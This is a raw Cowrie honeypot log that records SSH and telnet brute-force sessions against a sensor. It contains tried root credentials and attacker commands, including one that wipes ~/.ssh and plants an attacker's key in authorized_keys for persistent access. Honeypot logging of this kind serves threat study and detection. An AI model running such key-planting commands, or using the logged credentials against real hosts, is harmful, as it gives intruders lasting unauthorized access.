sh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:21.545621Z","src_ip":"14.103.112.104","session":"f6c7e28af0b9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:19:23.000791Z","src_ip":"14.103.112.104","session":"f6c7e28af0b9"}
{"eventid":"cowrie.session.closed","duration":"13.2","message":"Connection lost after 13.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:23.211698Z","src_ip":"14.103.112.104","session":"12697c7dcae9"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:23.212683Z","src_ip":"14.103.112.104","session":"f6c7e28af0b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38062,"dst_ip":"1.2.3.4","dst_port":23,"session":"45c091187073","protocol":"telnet","message":"New connection: 212.227.235.229:38062 (1.2.3.4:23) [session: 45c091187073]","sensor":"my-vps","timestamp":"2025-09-09T05:19:32.746087Z"}
{"eventid":"cowrie.session.closed","duration":12.620656967163086,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:45.366696Z","src_ip":"212.227.235.229","session":"45c091187073"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":54462,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ee083dac2aa","protocol":"ssh","message":"New connection: 14.103.112.104:54462 (1.2.3.4:22) [session: 4ee083dac2aa]","sensor":"my-vps","timestamp":"2025-09-09T05:19:52.185659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:52.583711Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:52.778383Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.login.success","username":"root","password":"ftpuser","message":"login attempt [root/ftpuser] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:19:53.605773Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:19:54.923632Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:19:54.924385Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:19:54.925298Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:55.127281Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:19:55.619489Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:19:55.620174Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:19:55.823180Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:55.824008Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":44168,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcfd1d3fb8e3","protocol":"ssh","message":"New connection: 14.103.112.104:44168 (1.2.3.4:22) [session: fcfd1d3fb8e3]","sensor":"my-vps","timestamp":"2025-09-09T05:19:56.012044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:56.017914Z","src_ip":"14.103.112.104","session":"fcfd1d3fb8e3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:56.214563Z","src_ip":"14.103.112.104","session":"fcfd1d3fb8e3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:19:57.987723Z","src_ip":"14.103.112.104","session":"fcfd1d3fb8e3"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:19:59.188771Z","src_ip":"14.103.112.104","session":"fcfd1d3fb8e3"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":44182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6192152ff3a7","protocol":"ssh","message":"New connection: 14.103.112.104:44182 (1.2.3.4:22) [session: 6192152ff3a7]","sensor":"my-vps","timestamp":"2025-09-09T05:19:59.397486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:19:59.398360Z","src_ip":"14.103.112.104","session":"6192152ff3a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:19:59.595111Z","src_ip":"14.103.112.104","session":"6192152ff3a7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:20:00.798688Z","src_ip":"14.103.112.104","session":"6192152ff3a7"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:20:00.996115Z","src_ip":"14.103.112.104","session":"4ee083dac2aa"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:20:00.997183Z","src_ip":"14.103.112.104","session":"6192152ff3a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60202,"dst_ip":"1.2.3.4","dst_port":23,"session":"85cb91b57dc4","protocol":"telnet","message":"New connection: 212.227.235.229:60202 (1.2.3.4:23) [session: 85cb91b57dc4]","sensor":"my-vps","timestamp":"2025-09-09T05:20:05.992177Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:20:06.197859Z","src_ip":"212.227.235.229","session":"85cb91b57dc4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:20:06.265414Z","src_ip":"212.227.235.229","session":"85cb91b57dc4"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":47206,"dst_ip":"1.2.3.4","dst_port":22,"session":"13b2f4be2742","protocol":"ssh","message":"New connection: 14.103.112.104:47206 (1.2.3.4:22) [session: 13b2f4be2742]","sensor":"my-vps","timestamp":"2025-09-09T05:20:27.408839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:20:27.409791Z","src_ip":"14.103.112.104","session":"13b2f4be2742"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:20:32.399259Z","src_ip":"14.103.112.104","session":"13b2f4be2742"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:20:32.401129Z","src_ip":"14.103.112.104","session":"13b2f4be2742"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64118,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eaecfe9e309","protocol":"ssh","message":"New connection: 217.72.205.35:64118 (1.2.3.4:22) [session: 4eaecfe9e309]","sensor":"my-vps","timestamp":"2025-09-09T05:20:48.507201Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:20:48.508589Z","src_ip":"217.72.205.35","session":"4eaecfe9e309"}
{"eventid":"cowrie.session.connect","src_ip":"14.103.112.104","src_port":36966,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a7585e7911f","protocol":"ssh","message":"New connection: 14.103.112.104:36966 (1.2.3.4:22) [session: 1a7585e7911f]","sensor":"my-vps","timestamp":"2025-09-09T05:21:01.401588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:21:01.402710Z","src_ip":"14.103.112.104","session":"1a7585e7911f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:21:02.205384Z","src_ip":"14.103.112.104","session":"1a7585e7911f"}
{"eventid":"cowrie.login.failed","username":"pcp","password":"1234567","message":"login attempt [pcp/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T05:21:04.632450Z","src_ip":"14.103.112.104","session":"1a7585e7911f"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:21:09.192517Z","src_ip":"14.103.112.104","session":"1a7585e7911f"}
{"eventid":"cowrie.session.connect","src_ip":"64.226.89.172","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"9711dae6def4","protocol":"ssh","message":"New connection: 64.226.89.172:6100 (1.2.3.4:22) [session: 9711dae6def4]","sensor":"my-vps","timestamp":"2025-09-09T05:21:14.211412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-09T05:21:14.224164Z","src_ip":"64.226.89.172","session":"9711dae6def4"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T05:21:14.241058Z","src_ip":"64.226.89.172","session":"9711dae6def4"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-09T05:21:15.052051Z","src_ip":"64.226.89.172","session":"9711dae6def4"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:21:15.053514Z","src_ip":"64.226.89.172","session":"9711dae6def4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:23:06.271069Z","src_ip":"212.227.235.229","session":"85cb91b57dc4"}
{"eventid":"cowrie.session.closed","duration":180.2839982509613,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:23:06.276104Z","src_ip":"212.227.235.229","session":"85cb91b57dc4"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":46401,"dst_ip":"1.2.3.4","dst_port":22,"session":"972e24e83474","protocol":"ssh","message":"New connection: 213.6.203.226:46401 (1.2.3.4:22) [session: 972e24e83474]","sensor":"my-vps","timestamp":"2025-09-09T05:23:18.695541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:23:18.696487Z","src_ip":"213.6.203.226","session":"972e24e83474"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:23:18.763491Z","src_ip":"213.6.203.226","session":"972e24e83474"}
{"eventid":"cowrie.login.failed","username":"Alphanetworks","password":"Alphanetworks","message":"login attempt [Alphanetworks/Alphanetworks] failed","sensor":"my-vps","timestamp":"2025-09-09T05:23:19.074305Z","src_ip":"213.6.203.226","session":"972e24e83474"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:23:20.143608Z","src_ip":"213.6.203.226","session":"972e24e83474"}
